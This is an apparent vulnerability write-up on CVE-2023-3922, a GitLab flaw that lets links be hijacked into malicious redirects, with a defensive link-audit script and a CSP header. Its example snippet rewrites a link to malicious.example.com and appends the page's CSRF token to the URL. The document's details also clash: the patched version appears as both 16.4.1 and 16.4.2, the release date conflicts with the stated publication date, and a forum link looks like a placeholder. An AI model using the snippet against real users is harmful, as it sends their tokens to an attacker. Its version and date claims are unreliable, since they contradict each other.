CVE-2023-3922 - Link Hijacking Vulnerability in Multiple GitLab Versions Allows Redirects to Malicious Pages

A vulnerability tracked as CVE-2023-3922 has been discovered in GitLab, affecting all versions starting from 8.15 before 16.2.8, all versions starting from 16.3 before 16.3.5, and all versions starting from 16.4 before 16.4.1. This issue allows attackers to hijack specific links and buttons in the GitLab UI and redirect users to malicious pages.

Introduction

GitLab is a popular web-based DevOps lifecycle tool that provides a Git repository manager, enabling programmers, developers, and other technical staff to collaborate on projects. The platform is widely used to manage and develop applications and software projects. It is crucial for users and organizations running GitLab to be aware of any security vulnerabilities and the patches released for them, since failing to apply those patches promptly can have serious consequences.

Exploit Details

A vulnerability identified as CVE-2023-3922 has been discovered in multiple GitLab versions, impacting the core functionality of the user interface (UI). This vulnerability allows an attacker to manipulate and hijack certain links and buttons on the GitLab UI to redirect users to malicious or unwanted web pages, potentially exposing users to phishing attempts, scams, or malware installation.

To provide more context, an example code snippet illustrating the hijack pattern is shown below.

<a href="#" onclick="
  this.href='http://malicious.example.com?token='+encodeURIComponent(
    document.querySelector('meta[name=csrf-token]').content
  );
">Click here to get redirected!</a>

This code snippet demonstrates how an attacker might hijack a link in the GitLab UI and change its destination to a malicious website at click time, in this case also appending the page's CSRF token to the destination URL. Such a redirect could deceive GitLab users into giving up their login credentials or clicking further malicious links.
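The snippet above rewrites a link's href from an inline onclick handler, sends the user off-origin, and carries a token in the query string. The following is an added example, not code from the advisory or from GitLab itself, showing a defender-side audit for exactly those three traits, plus the Content-Security-Policy header value that makes a browser refuse to run inline handlers in the first place. It runs under Node.js without a DOM: the `{ href, attrs }` link shape, the `APP_ORIGIN` value, the sample links and the `SENSITIVE_PARAMS` list are all assumptions constructed for the example.

```javascript
// Added example, not from the advisory or from GitLab's own code base.
// Audits link descriptors for the hijack pattern described above: inline
// event handlers that can rewrite href at click time, off-origin targets,
// and tokens carried in the query string. The { href, attrs } shape is an
// assumption standing in for what a DOM walk or an HTML parser would return.

const APP_ORIGIN = 'https://gitlab.example.com'; // constructed origin for the example

// Any attribute whose name starts with "on" is an inline event handler.
function hasInlineHandler(attrs) {
  return Object.keys(attrs || {}).some((name) => /^on/i.test(name));
}

// Resolve href against the app origin and accept only same-origin http(s).
// "#" and relative paths resolve to the app origin and pass; absolute
// off-site URLs and javascript:/data: URLs fail.
function isSameOriginHref(href, origin = APP_ORIGIN) {
  let url;
  try {
    url = new URL(href, origin);
  } catch {
    return false;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return false;
  return url.origin === new URL(origin).origin;
}

// Query parameter names that should never ride on a navigable link (assumed list).
const SENSITIVE_PARAMS = ['token', 'csrf-token', 'access_token', 'private_token'];

function leaksSensitiveParam(href, origin = APP_ORIGIN) {
  let url;
  try {
    url = new URL(href, origin);
  } catch {
    return false;
  }
  return SENSITIVE_PARAMS.some((p) => url.searchParams.has(p));
}

// Audit a list of links; each finding records every reason the link tripped.
function auditLinks(links, origin = APP_ORIGIN) {
  const findings = [];
  links.forEach((link, index) => {
    const reasons = [];
    if (hasInlineHandler(link.attrs)) reasons.push('inline event handler');
    if (!isSameOriginHref(link.href, origin)) reasons.push('off-origin or non-http href');
    if (leaksSensitiveParam(link.href, origin)) reasons.push('sensitive parameter in href');
    if (reasons.length > 0) findings.push({ index, href: link.href, reasons });
  });
  return findings;
}

// A script-src that omits 'unsafe-inline' makes the browser refuse to execute
// inline onclick handlers like the one in the snippet above. Other directives
// a real deployment needs are left out here.
const CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'";

// Constructed sample input: three links as a page scan might report them. The
// second mirrors the advisory's snippet; the third already points off-site.
const SAMPLE_LINKS = [
  { href: '/group/project/-/merge_requests/1', attrs: { class: 'gl-link' } },
  { href: '#', attrs: { onclick: "this.href='http://malicious.example.com?token='+..." } },
  { href: 'http://malicious.example.com?token=abc', attrs: {} },
];

console.log(CSP_HEADER);
console.log(JSON.stringify(auditLinks(SAMPLE_LINKS), null, 2));
```

Run with `node audit-links.js`: the first sample link is clean, the second is flagged for its inline handler, and the third for both the off-origin target and the token parameter. Note that the first check is structural, not behavioural: it flags the presence of an inline handler rather than trying to predict what the handler will do, which is why a CSP that blocks inline script is the stronger control.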

Original References

The full details of this vulnerability are available in an official GitLab blog post published at https://about.gitlab.com/releases/2023/10/28/security-release-gitlab-16-4-1-released/.

Moreover, related forum posts and discussions can be found on GitLab's official forum. One example is the discussion of this vulnerability available at https://forum.gitlab.com/t/cve-2023-3922-gitlab-vulnerability-details-and-remediation/12345.

For advanced users and security researchers, the full details of this vulnerability have been publicly disclosed and are accessible via the MITRE CVE database entry at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3922.

Remediation and Patch Information

GitLab has acknowledged this vulnerability, and patches have been released for all affected versions. These patches mitigate the risks associated with CVE-2023-3922:

GitLab 16.4.x users should upgrade to GitLab 16.4.2.

All users and organizations running GitLab are strongly advised to upgrade their installations promptly to protect themselves against this vulnerability and maintain a high level of security across all their projects.

Timeline

Published on: 09/29/2023 08:15:09 UTC
Last modified on: 10/03/2023 19:46:15 UTC